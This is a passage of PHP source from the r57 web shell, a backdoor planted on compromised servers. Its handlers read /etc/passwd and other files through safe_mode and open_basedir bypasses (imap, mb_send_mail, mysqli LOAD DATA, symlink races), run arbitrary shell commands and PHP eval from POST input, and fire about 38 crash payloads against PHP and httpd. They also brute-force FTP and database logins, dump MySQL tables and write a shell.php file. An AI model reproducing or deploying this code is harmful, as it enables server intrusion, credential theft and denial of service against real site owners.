r57_temp_table",$db); while(($row=@mssql_fetch_row($res))) { echo htmlspecialchars($row[0])."rn"; } @mssql_query("drop table r57_temp_table",$db); } else echo "[-] ERROR! Can't select database"; @mssql_close($db); } else echo "[-] ERROR! Can't connect to MSSQL server"; break; case 'test5': $temp=tempnam($dir, "fname"); if (@file_exists($temp)) @unlink($temp); $extra = "-C ".$_POST['test5_file']." -X $temp"; @mb_send_mail(NULL, NULL, NULL, NULL, $extra); $str = moreread($temp); echo htmlspecialchars($str); @unlink($temp); break; case 'test6': $stream = @imap_open('/etc/passwd', "", ""); $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*"); for ($i = 0; $i < count($dir_list); $i++) echo htmlspecialchars($dir_list[$i])."rn"; @imap_close($stream); break; case 'test7': $stream = @imap_open($_POST['test7_file'], "", ""); $str = @imap_body($stream, 1); echo htmlspecialchars($str); @imap_close($stream); break; case 'test8': $temp=@tempnam($_POST['test8_file2'], "copytemp"); $str = readzlib($_POST['test8_file1'],$temp); echo htmlspecialchars($str); @unlink($temp); break; case 'test9': @ini_restore("safe_mode"); @ini_restore("open_basedir"); $str = moreread($_POST['test9_file']); echo htmlspecialchars($str); break; case 'test10': @ob_clean(); $error_reporting = @ini_get('error_reporting'); error_reporting(E_ALL ^ E_NOTICE); @ini_set("display_errors", 1); @ini_alter("display_errors", 1); $str=@fopen($_POST['test10_file'],"r"); while(!feof($str)){print htmlspecialchars(fgets($str));} fclose($str); error_reporting($error_reporting); break; case 'test11': @ob_clean(); $temp = 'zip://'.$_POST['test11_file']; $str = moreread($temp); echo htmlspecialchars($str); break; case 'test12': @ob_clean(); $temp = 'compress.bzip2://'.$_POST['test12_file']; $str = moreread($temp); echo htmlspecialchars($str); break; case 'test13': @error_log($_POST['test13_file1'], 3, "php://../../../../../../../../../../../".$_POST['test13_file2']); echo $lang[$language.'_text61']; break; case 'test14': @session_save_path($_POST['test14_file2'].";$tempdir"); @session_start(); @$_SESSION[php]=$_POST['test14_file1']; echo $lang[$language.'_text61']; break; case 'test15': @readfile($_POST['test15_file1'], 3, "php://../../../../../../../../../../../".$_POST['test15_file2']); echo $lang[$language.'_text61']; break; case 'test16': if (@fopen('srpath://../../../../../../../../../../../'.$_POST['test16_file'],"a")) echo $lang[$language.'_text61']; break; case 'test17_1': @unlink('symlinkread'); @symlink('a/a/a/a/a/a/', 'dummy'); @symlink('dummy/../../../../../../../../../../../'.$_POST['test17_file'], 'symlinkread'); @unlink('dummy'); while (1) { @symlink('.', 'dummy'); @unlink('dummy'); } break; case 'test17_2': $str=''; while (strlen($str) < 3) { /* $str = moreread('symlinkread');*/ $str = @file_get_contents('symlinkread'); if($str){ @ob_clean(); echo htmlspecialchars($str);} } break; case 'test17_3': $dir = $files = array(); if(@version_compare(@phpversion(),"5.0.0")>=0){ while (@count($dir) < 3) { $dir=@scandir('symlinkread'); if (@count($dir) > 2) {@ob_clean(); @print_r($dir); } } } else { while (@count($files) < 3) { $dh = @opendir('symlinkread'); while (false !== ($filename = @readdir($dh))) { $files[] = $filename; } if(@count($files) > 2){@ob_clean(); @print_r($files); } } } break; case 'test18': @putenv("TMPDIR=".$_POST['test18_file2']); @ini_set("session.save_path", ""); @ini_alter("session.save_path", ""); @session_start(); @$_SESSION[php]=$_POST['test18_file1']; echo $lang[$language.'_text61']; break; case 'test19': if(empty($_POST['test19_port'])) { $_POST['test19_port'] = "3306"; } $m = new mysqli('localhost',$_POST['test19_ml'],$_POST['test19_mp'],$_POST['test19_md'],$_POST['test19_port']); if(@mysqli_connect_errno()){ echo "[-] ERROR! Can't connect to mysqli server: ".mysqli_connect_error() ;}; $m->options(MYSQLI_OPT_LOCAL_INFILE, 1); $m->set_local_infile_handler("r"); $m->query("DROP TABLE IF EXISTS temp_r57_table"); $m->query("CREATE TABLE temp_r57_table ( 'file' LONGBLOB NOT NULL )"); $m->query("LOAD DATA LOCAL INFILE "".$_POST['test19_file']."" INTO TABLE temp_r57_table"); $r = $m->query("SELECT * FROM temp_r57_table"); while(($r_sql = @mysqli_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."rn"; } $m->query("DROP TABLE IF EXISTS temp_r57_table"); $m->close(); break; } } if((!$safe_mode) && ($_POST['cmd']!="php_eval") && ($_POST['cmd']!="mysql_dump") && ($_POST['cmd']!="db_query") && ($_POST['cmd']!="ftp_brute") && ($_POST['cmd']!="db_brute")){ $cmd_rep = ex($_POST['cmd']); if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."n"; } else { echo @htmlspecialchars($cmd_rep)."n"; } }/*elseif($safe_mode){ $cmd_rep = safe_ex($_POST['cmd']); if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."n"; } else { echo @htmlspecialchars($cmd_rep)."n"; } } */ switch($_POST['cmd']) { case 'dos1': function a() { a(); } a(); break; case 'dos2': @pack("d4294967297", 2); break; case 'dos3': $a = "a";@unserialize(@str_replace('1', 2147483647, @serialize($a))); break; case 'dos4': $t = array(1);while (1) {$a[] = &$t;}; break; case 'dos5': @dl("sqlite.so");$db = new SqliteDatabase("foo"); break; case 'dos6': preg_match('/(.(?!b))*/', @str_repeat("a", 10000)); break; case 'dos7': @str_replace("A", str_repeat("B", 65535), str_repeat("A", 65538)); break; case 'dos8': @shell_exec("killall -11 httpd"); break; case 'dos9': function cx(){ @tempnam("/www/", '../../../../../..'.$tempdir.'cx'); cx(); } cx(); break; case 'dos10': $a = @str_repeat ("A",438013);$b = @str_repeat ("B",951140);@wordwrap ($a,0,$b,0); break; case 'dos11': @array_fill(1,123456789,"Infigo-IS"); break; case 'dos12': @substr_compare("A","A",12345678); break; case 'dos13': @unserialize("a:2147483649:{"); break; case 'dos14': $Data = @str_ireplace("n", "
", $Data); break; case 'dos15': function toUTF($x) {return chr(($x >> 6) + 192) . chr(($x & 63) + 128);} $str1 = "";for($i=0; $i < 64; $i++){ $str1 .= toUTF(977);} @htmlentities($str1, ENT_NOQUOTES, "UTF-8"); break; case 'dos16': $r = @zip_open("x.zip");$e = @zip_read($r);$x = @zip_entry_open($r, $e); for ($i=0; $i<1000; $i++) $arr[$i]=array(array("")); unset($arr[600]);@zip_entry_read($e, -1);unset($arr[601]); break; case 'dos17': $z = "UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU"; $y = "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD"; $x = "AQ "; unset($z);unset($y);$x = base64_decode($x);$y = @sqlite_udf_decode_binary($x);unset($x); break; case 'dos18': $MSGKEY = 519052;$msg_id = @msg_get_queue ($MSGKEY, 0600); if (!@msg_send ($msg_id, 1, 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH', false, true, $msg_err)) echo "Msg not sent because $msg_errn"; if (@msg_receive ($msg_id, 1, $msg_type, 0xffffffff, $_SESSION, false, 0, $msg_error)) { echo "$msgn"; } else { echo "Received $msg_error fetching messagen"; break; } @msg_remove_queue ($msg_id); break; case 'dos19': $url = "php://filter/read=OFF_BY_ONE./resource=/etc/passwd"; @fopen($url, "r"); break; case 'dos20': $hashtable = str_repeat("A", 39); $hashtable[5*4+0]=chr(0x58);$hashtable[5*4+1]=chr(0x40);$hashtable[5*4+2]=chr(0x06);$hashtable[5*4+3]=chr(0x08); $hashtable[8*4+0]=chr(0x66);$hashtable[8*4+1]=chr(0x77);$hashtable[8*4+2]=chr(0x88);$hashtable[8*4+3]=chr(0x99); $str = 'a:100000:{s:8:"AAAABBBB";a:3:{s:12:"0123456789AA";a:1:{s:12:"AAAABBBBCCCC";i:0;}s:12:"012345678AAA";i:0;s:12:"012345678BAN";i:0;}'; for ($i=0; $i<65535; $i++) { $str .= 'i:0;R:2;'; } $str .= 's:39:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:39:"'.$hashtable.'";i:0;R:3;'; @unserialize($str); break; case 'dos21': imagecreatetruecolor(1234,1073741824); break; case 'dos22': imagecopyresized(imagecreatetruecolor(0x7fffffff, 120),imagecreatetruecolor(120, 120), 0, 0, 0, 0, 0x7fffffff, 120, 120, 120); break; case 'dos23': $a = str_repeat ("A",9989776); $b = str_repeat("/", 2798349); iconv_substr($a,0,1,$b); break; case 'dos24': setlocale(LC_COLLATE, str_repeat("A", 34438013)); break; case 'dos25': glob(str_repeat("A", 9638013)); break; case 'dos26': glob("a",-1); break; case 'dos27': fnmatch("*[1]e", str_repeat("A", 9638013)); break; case 'dos28': if (extension_loaded("gd")){ $buff = str_repeat("A",9999); $res = imagepsloadfont($buff); echo "boom!!n";} break; case 'dos29': if(function_exists('msql_connect')){ msql_pconnect(str_repeat('A',49424).'BBBB'); msql_connect(str_repeat('A',49424).'BBBB');} break; case 'dos30': $a=str_repeat("A", 65535); $b=1; $c=str_repeat("A", 65535); chunk_split($a,$b,$c); break; case 'dos31': if (extension_loaded("win32std") ) { win_browse_file( 1, NULL, str_repeat( "x90", 264 ), NULL, array( "*" => "*.*" ) );} break; case 'dos32': if (extension_loaded( "iisfunc" ) ){ $buf_unicode = str_repeat( "A", 256 ); $eip_unicode = "x41x41"; iis_getservicestate( $buf_unicode . $eip_unicode );} break; case 'dos33': $buff = str_repeat("x41", 250);$get_EIP = "x42x42";$get_ESP = str_repeat("x43", 100);$get_EBP = str_repeat("x44", 100);ntuser_getuserlist($buff.$get_EIP.$get_ESP.$get_EBP); break; case 'dos34': if (extension_loaded("bz2")){ $buff = str_repeat("a",1000); com_print_typeinfo($buff);} break; case 'dos35': $a = str_repeat("/", 4199000); iconv(1, $a, 1); break; case 'dos36': $a = str_repeat("/", 2991370); iconv_mime_decode_headers(0, 1, $a); break; case 'dos37': $a = str_repeat("/", 3799000); iconv_mime_decode(1, 0, $a); break; case 'dos38': $a = str_repeat("/", 9791999); iconv_strlen(1, $a); break; } if ($_POST['cmd']=="php_eval"){ $eval = @str_replace("","",$eval); @eval($eval);} if ($_POST['cmd']=="ftp_brute") { $suc = 0; if($_POST['brute_method']=='passwd'){ foreach($users as $user) { $connection = @ftp_connect($ftp_server,$ftp_port,10); if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - successrn"; $suc++; } else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - successrn"; $suc++; } } @ftp_close($connection); } }else if(($_POST['brute_method']=='dic') && isset($_POST['ftp_login'])){ foreach($users as $user) { $connection = @ftp_connect($ftp_server,$ftp_port,10); if(@ftp_login($connection,$_POST['ftp_login'],$user)) { echo "[+] ".$_POST['ftp_login'].":$user - successrn"; $suc++; } @ftp_close($connection); } } echo "rn-------------------------------------rn"; $count = count($users); if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; } echo $lang[$language.'_text97'].$count."rn"; echo $lang[$language.'_text98'].$suc."rn"; } if ($_POST['cmd']=="db_brute") { $suc = 0; if($_POST['brute_method']=='passwd'){ foreach($users as $user) { $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $user; $sql->pass = $user; if($sql->connect()) { echo "[+] $user:$user - successrn"; $suc++; } } if(isset($_POST['reverse'])) { foreach($users as $user) { $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $user; $sql->pass = strrev($user); if($sql->connect()) { echo "[+] $user:".strrev($user)." - successrn"; $suc++; } } } }else if(($_POST['brute_method']=='dic') && isset($_POST['mysql_l'])){ foreach($users as $user) { $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $user; if($sql->connect()) { echo "[+] ".$_POST['mysql_l'].":$user - successrn"; $suc++; } } } echo "rn-------------------------------------rn"; $count = count($users); if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; } echo $lang[$language.'_text97'].$count."rn"; echo $lang[$language.'_text98'].$suc."rn"; } if ($_POST['cmd']=="mysql_dump") { if(isset($_POST['dif'])) { morewrite($_POST['dif_name'], "mysql_dumprn"); } $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; } else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; } else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; } else { if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."rn"; } else if(@is_writable($_POST['dif_name'])){ foreach($sql->dump as $v){ morewrite($_POST['dif_name'], $v."rn");} } else { echo "[-] ERROR! Can't write in dump file"; } } } echo "

"; echo ""; echo "

"; echo "

"; function div_title($title, $id) { return ''.$title.''; } function div($id) { if(isset($_COOKIE[$id]) && ($_COOKIE[$id]==0)) return ''; $divid=array('id5','id6','id8','id9','id10','id11','id16','id24','id25','id26','id27','id28','id29','id33','id34','id35','id37','id38','id39'); if(empty($_COOKIE[$id]) && @in_array($id,$divid)) return '

'.$table_end1.$fe; } echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts; echo sr(15,"".$lang[$language.'_text43'].$arrow."",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); echo $te.''.$table_end1.$fe; if($safe_mode || $open_basedir){ echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts; echo sr(15,"".$lang[$language.'_text58'].$arrow."",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."".$lang[$language.'_text65']."".$lang[$language.'_text66']."".ws(3)."".$lang[$language.'_text59']."".$lang[$language.'_text60']."".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); echo $te.''.$table_end1.$fe; } if($unix && @function_exists('touch')){ echo $fs.$table_up1.div_title($lang[$language.'_text128'],'id5').$table_up2.div('id5').$ts; echo sr(15,"".$lang[$language.'_text43'].$arrow."",in('text','file_name',40,(!empty($_POST['file_name'])?($_POST['file_name']):($_SERVER["SCRIPT_FILENAME"]))) .ws(4)."".$lang[$language.'_text26'].ws(2).$lang[$language.'_text59'].$arrow."" .ws(2).in('text','file_name_r',40,(!empty($_POST['file_name_r'])?($_POST['file_name_r']):("")))); echo sr(15," or set Day".$arrow."", '12345678910111213141516171819202122232425262728293031' .ws(4)."Month".$arrow."" .'JanuaryFebruaryMarchAprilMayJuneJulyAugustSeptemberOctoberNovemberDecember' .ws(4)."Year".$arrow."" .'1998199920002001200220032004200520062007200820092010' .ws(4)."Hour".$arrow."" .'010203040506070809101112131415161718192021222324' .ws(4)."Minute".$arrow."" .'1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859' .ws(4)."Second".$arrow."" .'1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859' .in('hidden','cmd',0,'touch') .in('hidden','dir',0,$dir) .ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); echo $te.''.$table_end1.$fe; } $select=''; if(@function_exists('chmod')){$select .= "CHMOD";} if(@function_exists('chown')){$select .= "CHOWN";} if(@function_exists('chgrp')){$select .= "CHGRP";} if($unix && $select){ echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id6').$table_up2.div('id6').$ts; echo @sr(15,"".$lang[$language.'_text43'].$arrow."",in('text','param1',55,(($_POST['param1'])?($_POST['param1']):($_SERVER["SCRIPT_FILENAME"]))).ws(2)."".$lang[$language.'_text68'].$arrow.""."".$select."".ws(4).in('text','param2 title="'.$lang[$language.'_text71'].'"',10,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); echo $te.''.$table_end1.$fe; } if(!$safe_mode){ $aliases2 = ''; foreach ($aliases as $alias_name=>$alias_cmd) { $aliases2 .= "$alias_name"; } echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id7').$table_up2.div('id7').$ts; echo sr(15,"".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."","".$aliases2."".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); echo $te.''.$table_end1.$fe; } echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id8').$table_up2.div('id8').$ts; echo sr(15,"".$lang[$language.'_text52'].$arrow."",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); echo sr(15,"".$lang[$language.'_text53'].$arrow."",in('text','s_dir',85,$dir)." * ( /root;/home;$tempdir )"); echo sr(15,"".$lang[$language.'_text55'].$arrow."",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); echo $te.''.$table_end1.$fe; if(!$safe_mode && $unix){ echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id9').$table_up2.div('id9').$ts; echo sr(15,"".$lang[$language.'_text72'].$arrow."",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); echo sr(15,"".$lang[$language.'_text73'].$arrow."",in('text','s_dir',85,$dir)." * ( /root;/home;$tempdir )"); echo sr(15,"".$lang[$language.'_text74'].$arrow."",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); echo $te.''.$table_end1.$fe; } echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id10').$table_up2.$font; echo "".div('id10').""; echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); echo "
".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); echo ""; echo $table_end1.$fe; if($safe_mode || $open_basedir) { echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts; echo ""; echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); echo $te.''.$table_end1.$fe; } if(($safe_mode || $open_basedir) && $curl_on && @version_compare(@phpversion(),"5.2.0")<=0) { echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id12').$table_up2.div('id12').$ts; echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); echo $te.''.$table_end1.$fe; } if(($safe_mode || $open_basedir) && $mysql_on) { echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id13').$table_up2.div('id13').$ts; echo sr(15,"".$lang[$language.'_text36'].$arrow."",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."".$lang[$language.'_text37'].$arrow."".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."".$lang[$language.'_text38'].$arrow."".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."".$lang[$language.'_text14'].$arrow."".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306")))); echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); echo $te.''.$table_end1.$fe; } if(($safe_mode || $open_basedir) && $mysqli_on) { echo $fs.$table_up1.div_title($lang[$language.'_text144'],'id40').$table_up2.div('id40').$ts; echo sr(15,"".$lang[$language.'_text36'].$arrow."",in('text','test19_md',15,(!empty($_POST['test19_md'])?($_POST['test19_md']):("mysqli"))).ws(4)."".$lang[$language.'_text37'].$arrow."".in('text','test19_ml',15,(!empty($_POST['test19_ml'])?($_POST['test19_ml']):("root"))).ws(4)."".$lang[$language.'_text39'].$arrow."".in('text','test19_mp',15,(!empty($_POST['test19_mp'])?($_POST['test19_mp']):("password"))).ws(4)."".$lang[$language.'_text14'].$arrow."".in('text','test19_port',15,(!empty($_POST['test19_port'])?($_POST['test19_port']):("3306")))); echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test19_file',96,(!empty($_POST['test19_file'])?($_POST['test19_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test19').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); echo $te.''.$table_end1.$fe; } if(($safe_mode || $open_basedir) && $mssql_on) { echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id14').$table_up2.div('id14').$ts; echo sr(15,"".$lang[$language.'_text36'].$arrow."",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."".$lang[$language.'_text37'].$arrow."".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."".$lang[$language.'_text38'].$arrow."".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."".$lang[$language.'_text14'].$arrow."".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); echo sr(15,"".$lang[$language.'_text3'].$arrow."",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); echo $te.''.$table_end1.$fe; } if(($safe_mode || $open_basedir) && $unix && @function_exists('mb_send_mail') && @version_compare(@phpversion(),"5.2.0")<=0){ echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id15').$table_up2.div('id15').$ts; echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); echo $te.''.$table_end1.$fe; } if(($safe_mode || $open_basedir) && @function_exists('imap_open') && @function_exists('imap_list') && @version_compare(@phpversion(),"5.2.0")<=0){ echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id20').$table_up2.div('id20').$ts; echo sr(15,"".$lang[$language.'_text4'].$arrow."",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); echo $te.''.$table_end1.$fe; } if(($safe_mode || $open_basedir) && @function_exists('imap_open') && @function_exists('imap_body') && @version_compare(@phpversion(),"5.2.0")<=0){ echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id21').$table_up2.div('id21').$ts; echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); echo $te.''.$table_end1.$fe; } if(($safe_mode || $open_basedir) && @function_exists('copy') && @version_compare(@phpversion(),"5.2.0")<=0) { echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id22').$table_up2.div('id22').$ts; echo sr(15,"".$lang[$language.'_text116'].$arrow."",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8')); echo sr(15,"".$lang[$language.'_text117'].ws(2).$lang[$language.'_text60'].$arrow."",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); echo $te.''.$table_end1.$fe; } if(($safe_mode || $open_basedir) && @function_exists('ini_restore') && @version_compare(@phpversion(),"5.2.0")<=0){ echo $fs.$table_up1.div_title($lang[$language.'_text120'],'id23').$table_up2.div('id23').$ts; echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test9_file',96,(!empty($_POST['test9_file'])?($_POST['test9_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test9').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); echo $te.''.$table_end1.$fe; } if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.0.0")<0){ echo $fs.$table_up1.div_title($lang[$language.'_text121'],'id24').$table_up2.div('id24').$ts; echo sr(15,"".$lang[$language.'_text4'].$arrow."",in('text','test10_file',96,(!empty($_POST['test10_file'])?($_POST['test10_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test10').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); echo $te.''.$table_end1.$fe; } if(($safe_mode || $open_basedir) && @function_exists('glob') && @version_compare(@phpversion(),"5.2.2")<=0){ echo $fs.$table_up1.div_title($lang[$language.'_text122'],'id19').$table_up2.div('id19').$ts; echo sr(15,"".$lang[$language.'_text4'].$arrow."",in('text','dir',96,(!empty($_POST['test_global'])?($_POST['test_global']):($dir))).in('hidden','cmd',0,'safe_dir').in('hidden','glob',0,'glob').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); echo $te.''.$table_end1.$fe; } if(($safe_mode || $open_basedir) && @function_exists('realpath') && @version_compare(@phpversion(),"5.2.4")<=0){ $select_n_rlph = "[ 1 ] (<<0,01 sec)[ 2 ] (<0,01 sec)". "[ 3 ] (". "[ 4 ] ([ 5 ] (>100 sec (danger))[ 6 ] (>>100 sec (danger))"; echo $fs.$table_up1.div_title($lang[$language.'_text145'],'id41').$table_up2.div('id41').$ts; echo sr(15,"".$lang[$language.'_text4'].$arrow."",in('text','dir',30,(!empty($_POST['dir_rlph'])?($_POST['dir_rlph']):($dir))).ws(2).''.$lang[$language.'_text55'].''.ws(2).in('text','end_rlph',6,(!empty($_POST['end_rlph'])?($_POST['end_rlph']):('.php'))).ws(2).in('hidden','cmd',0,'safe_dir').ws(2).''.$lang[$language.'_text146'].''.ws(2).$select_n_rlph.ws(2).in('hidden','realpath',0,'realpath').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); echo $te.''.$table_end1.$fe; } if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.2")<=0) { echo $fs.$table_up1.div_title($lang[$language.'_text130'],'id25').$table_up2.div('id25').$ts; echo sr(15,"".$lang[$language.'_text116'].$arrow."",in('text','test11_file',96,(!empty($_POST['test11_file'])?($_POST['test11_file']):($tempdir.'test.zip'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test11').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); echo $te.''.$table_end1.$fe; } if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.2")<=0) { echo $fs.$table_up1.div_title($lang[$language.'_text123'],'id26').$table_up2.div('id26').$ts; echo sr(15,"".$lang[$language.'_text116'].$arrow."",in('text','test12_file',96,(!empty($_POST['test12_file'])?($_POST['test12_file']):($tempdir.'test.bzip'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test12').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); echo $te.''.$table_end1.$fe; } if(($safe_mode || $open_basedir) && @function_exists('error_log') && @version_compare(@phpversion(),"5.2.2")<=0) { echo $fs.$table_up1.div_title($lang[$language.'_text124'],'id27').$table_up2.div('id27').$ts; echo sr(15,"".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."",in('text','test13_file2',96,(!empty($_POST['test13_file2'])?($_POST['test13_file2']):($dir."shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test13')); echo sr(15,"".$lang[$language.'_text125'].$arrow."",in('text','test13_file1',96,(!empty($_POST['test13_file1'])?($_POST['test13_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10'])); echo $te.''.$table_end1.$fe; } if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.2")<=0) { echo $fs.$table_up1.div_title($lang[$language.'_text126'],'id28').$table_up2.div('id28').$ts; echo sr(15,"".$lang[$language.'_text4'].$arrow."",in('text','test14_file2',96,(!empty($_POST['test14_file2'])?($_POST['test14_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test14')); echo sr(15,"".$lang[$language.'_text125'].$arrow."",in('text','test14_file1',96,(!empty($_POST['test14_file1'])?($_POST['test14_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10'])); echo $te.''.$table_end1.$fe; } if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.4")<=0) { echo $fs.$table_up1.div_title($lang[$language.'_text133'],'id39').$table_up2.div('id39').$ts; echo sr(15,"".$lang[$language.'_text4'].$arrow."",in('text','test18_file2',96,(!empty($_POST['test18_file2'])?($_POST['test18_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test18')); echo 